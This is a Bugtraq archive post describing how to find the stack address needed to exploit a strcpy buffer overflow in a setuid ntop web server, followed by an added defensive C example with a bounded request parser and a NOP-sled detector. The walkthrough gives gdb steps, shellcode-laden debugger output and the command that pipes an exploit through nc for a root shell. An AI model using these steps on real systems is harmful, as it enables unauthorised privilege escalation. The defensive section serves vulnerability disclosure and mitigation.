Bugtraq mailing list archives
How to find ntop -w esp value.
From: JW Oh <mat () IVNTECH COM>
Date: Thu, 26 Oct 2000 13:32:41 +0900
1. [on victim host] First modify the ntop-1.2a1 source code so that it runs with non-root privilege, and compile it. ntop.c:362:

   if((0 && (rFileName == NULL) && (getuid () && geteuid ()) || setuid (0)) ){

2. [on local host] Run "tcpdump -w somefile" to get a tcpdump file to feed to ntop. Copy it to the victim host.

3. [on victim host] Execute the following with our modified ntop:

   $ ./ntop -w 8080 -f somefile
   Warning: unable to read file '.ntop'. No security will be used!
   Waiting for HTTP connections on port 8080...

4. [on victim host] Run gdb to attach to our ntop process, and break at the function returnHTTPPage:

   $ gdb ./ntop 2634
   (gdb) break returnHTTPPage
   Breakpoint 1 at 0x8051350
   (gdb) cont
   Continuing.
   [Switching to Thread 28851]

5. [on local host] Execute the exploit against the victim host:

   $ ./ntop-w-exp | nc victim 8080

6. [on victim host] gdb will stop at the returnHTTPPage breakpoint. Then set a breakpoint on the function strcpy and continue; gdb will stop at the strcpy breakpoint. The value of "dest=0xbefffb00" is the location on the stack that we will use as the esp value.

   Breakpoint 1, 0x8051350 in returnHTTPPage ()
   (gdb) break strcpy
   Breakpoint 2 at 0x400c842a: file ../sysdeps/generic/strcpy.c, line 33.
   (gdb) cont
   Continuing.
   Breakpoint 2, strcpy (dest=0xbefffb00 "$爻쓩\017\005\b\b", src=0x8091dc1 '\220' <repeats 50 times>, "圍037^\211v\b1옌210F\a\211F\fs.013\211晋215N\b\215V\f儆2001蜜211鶩儆200汪mes>bin/sh\030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030"...) at ../sysdeps/generic/strcpy.c:33
   (gdb) cont
   Continuing.

7. [on victim host] Now kill our ntop and run the suid ntop:

   $ /usr/local/sbin/ntop -w 8080

8. [on local host] Modify the esp value in ntop-w-exp.c and execute the exploit. You can set the offset with the first argument to ntop-w-exp. I think the offset must be a negative value.

   $ ./ntop-w-exp | nc victim 8080

9. [on victim host] You will get a root shell.
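The gdb session above stops on strcpy() copying attacker-supplied request data (a 0x90 NOP sled, shown by gdb as '\220' <repeats 50 times>) into a buffer at a stack address, which is the bug class that makes the esp value worth finding. The following C code is an added illustration written for this archive page; it is not ntop's code and the request-line format, buffer size (PATH_MAX_LEN) and helper names are assumptions. It shows the bounded handling that would have refused the over-long request instead of overwriting the stack, plus a simple detector for the NOP-sled pattern visible in the gdb output.

```c
#include <stdio.h>
#include <string.h>

/* Largest request path the handler accepts. Constructed for this example;
 * it is not the size of any real ntop buffer. */
#define PATH_MAX_LEN 256

/* Result codes returned by parse_request_path(). */
#define REQ_TOO_LONG  (-1)
#define REQ_MALFORMED (-2)

/*
 * Copy the request-target from an HTTP request line such as
 * "GET /index.html HTTP/1.0" into dst, refusing anything that does not fit.
 * The unsafe pattern the gdb session breaks on is
 *     strcpy(stack_buffer, request_data);
 * with no length check. Here the length is checked before a bounded copy,
 * so an over-long request is rejected rather than written past the buffer.
 * Returns the path length, or a negative REQ_* code.
 */
static int parse_request_path(const char *line, char *dst, size_t dstlen)
{
    const char *sp = strchr(line, ' ');
    if (sp == NULL) {
        return REQ_MALFORMED;        /* no method/target separator */
    }
    const char *start = sp + 1;
    const char *end = strchr(start, ' ');
    size_t n = end ? (size_t)(end - start) : strlen(start);
    if (n == 0) {
        return REQ_MALFORMED;        /* empty request-target */
    }
    if (n >= dstlen) {
        return REQ_TOO_LONG;         /* would not fit with its NUL terminator */
    }
    memcpy(dst, start, n);
    dst[n] = '\0';
    return (int)n;
}

/* Convenience wrapper using an internal buffer; returns the same codes. */
static int request_path_len(const char *line)
{
    char dst[PATH_MAX_LEN];
    return parse_request_path(line, dst, sizeof dst);
}

/* Length of the longest run of byte b in buf. A long run of 0x90 is the
 * classic NOP-sled signature seen in the gdb output above. */
static size_t longest_byte_run(const unsigned char *buf, size_t len, unsigned char b)
{
    size_t best = 0, cur = 0;
    for (size_t i = 0; i < len; i++) {
        if (buf[i] == b) {
            cur++;
            if (cur > best) best = cur;
        } else {
            cur = 0;
        }
    }
    return best;
}

/* Detection helper: 1 if the request carries a 0x90 run of at least
 * threshold bytes. Takes an explicit length so embedded NULs do not cut it short. */
static int has_nop_sled(const unsigned char *req, size_t len, size_t threshold)
{
    return longest_byte_run(req, len, 0x90) >= threshold;
}

/* Build a constructed over-long request (a path of pathlen 'A' bytes) and
 * run the bounded parser on it. Returns the parser's result code. */
static int check_long_request(size_t pathlen)
{
    char line[2048];
    char dst[PATH_MAX_LEN];
    if (pathlen + 16 >= sizeof line) {
        pathlen = sizeof line - 17;
    }
    memcpy(line, "GET ", 4);
    memset(line + 4, 'A', pathlen);
    memcpy(line + 4 + pathlen, " HTTP/1.0", 10);   /* 9 chars plus NUL */
    return parse_request_path(line, dst, sizeof dst);
}

/* Constructed sample shaped like the gdb output: a 50-byte NOP sled followed
 * by a marker. Not copied from the original post. Returns the detector result. */
static int demo_sled_request_flagged(void)
{
    unsigned char req[64];
    memset(req, 0x90, 50);
    memcpy(req + 50, "END", 3);
    return has_nop_sled(req, 53, 16);
}

int main(void)
{
    printf("normal request path length: %d\n", request_path_len("GET /index.html HTTP/1.0"));
    printf("400-byte path: %d (REQ_TOO_LONG is %d)\n", check_long_request(400), REQ_TOO_LONG);
    printf("sled detector on constructed sled request: %d\n", demo_sled_request_flagged());
    return 0;
}
```

The parser refuses rather than truncates: silently cutting a request at the buffer size would hide the fact that someone sent a 400-byte request-target to a daemon that expects short paths, which is itself worth logging. The run-length check is deliberately crude; it is meant to show what a 50-byte 0x90 run looks like to a detector, not to be a complete signature.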
================================================= | | | mat () hacksware com | | | =================================================